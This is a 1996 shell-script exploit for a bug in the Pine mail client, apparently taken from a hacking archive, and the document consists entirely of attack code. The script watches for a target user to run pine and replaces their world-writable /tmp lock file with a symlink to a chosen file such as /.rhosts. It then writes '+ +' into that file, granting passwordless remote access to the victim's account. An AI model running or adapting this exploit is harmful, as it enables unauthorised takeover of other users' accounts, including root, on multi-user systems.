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- #!/bin/sh
- #
- # ET Lownoise 1996 Colombia
- # pine bug exploit
- #
- # usage: pine.sh username path/file_to_create &
- # ex: pine.sh root /.rhosts &
- # ex2: pine.sh root /.rhosts > out & (and go to sleep).
- #
- # version 3.91, 3.92 .....
- # version 3.95 fixed
- #
- # Note: must do some changes in the script. look 4 CHANGE THIS:
- #
- # Yea i know is a lame script but is better than nothing..
- # try to exploit the bug without a script and you will wait
- # forever.
- # e-torres@uniandes.edu.co
- #
- argumentos=0
- if [ $# -eq $argumentos ]
- then
- echo "Usage: $0 username path/file_to_create & "
- echo "ET Lownoise 1996 Colombia"
- exit
- fi
- username=$1
- archivo=$2
- #text='text to puit in file to create'
- #usr=path of the program users
- #pineprog=how the pine program appears when u do a w (who) command
- text='+ +'
- usr=users
- pineprog=pine
- #
- date
- echo "- Looking for $1 to log in... just wait"
- #
- entrada=0
- entro=0
- until [ $entro -eq $entrada ]
- do
- for nombre in `$usr`
- do
- if [ $nombre = $1 ]
- then
- entro=1
- fi
- done
- done
- date
- echo "- Ok $username is logged now."
- #
- echo "- Lets wait that $1 run pine. "
- noejecuto=0
- ejecuto=0
- until [ $ejecuto -ne $noejecuto ]
- do
- for ejecutando in `w $username`
- do
- if [ $ejecutando = $pineprog ]
- then
- date
- echo '- OK ' $1 ' is running ' $pineprog '.'
- ejecuto=1
- fi
- done
- done
- echo "- Now lets grab the lock file of $username from /tmp"
- ls -al /tmp | grep $username > temp1
- cat temp1 | grep rw-rw-rw- > temporal
- lockfile=`awk '{print $9}' temporal`
- rm temp1
- rm temporal
- echo "> Username $username"
- echo "> Lockfile $lockfile"
- echo
- echo "- OK now im going to wait that $username "
- echo " quits $pineprog "
- # do it till exist lockfile, that means username havent quit pine
- cd /tmp
- while [ -s $lockfile ]
- do
- sleep 0
- done
- cd
- date
- echo "- OK $username quit $pineprog .. now to link $lockfile "
- #$archivo is the complete path of file in username
- cd /tmp
- ln -s $archivo $lockfile
- echo "- $lockfile is now linked "
- cd
- echo "- $username must now return to pine to create"
- echo " $archivo "
- echo "- Waiting $username to return pine "
- noejecuto=0
- ejecuto=0
- until [ $ejecuto -ne $noejecuto ]
- do
- for ejecutando in `w $username `
- do
- if [ $ejecutando = $pineprog ]
- then
- date
- echo '- OK ' $username ' is running ' $pineprog
- ejecuto=1
- fi
- done
- done
- echo "- Introducing text..."
- cd /tmp
- echo $text > $lockfile
- echo "- Erasing $lockfile "
- rm $lockfile
- cd
- echo "THE END DUDE!"
- echo "ET Lownoise 1996 "
- # www.hack.co.za [2000]#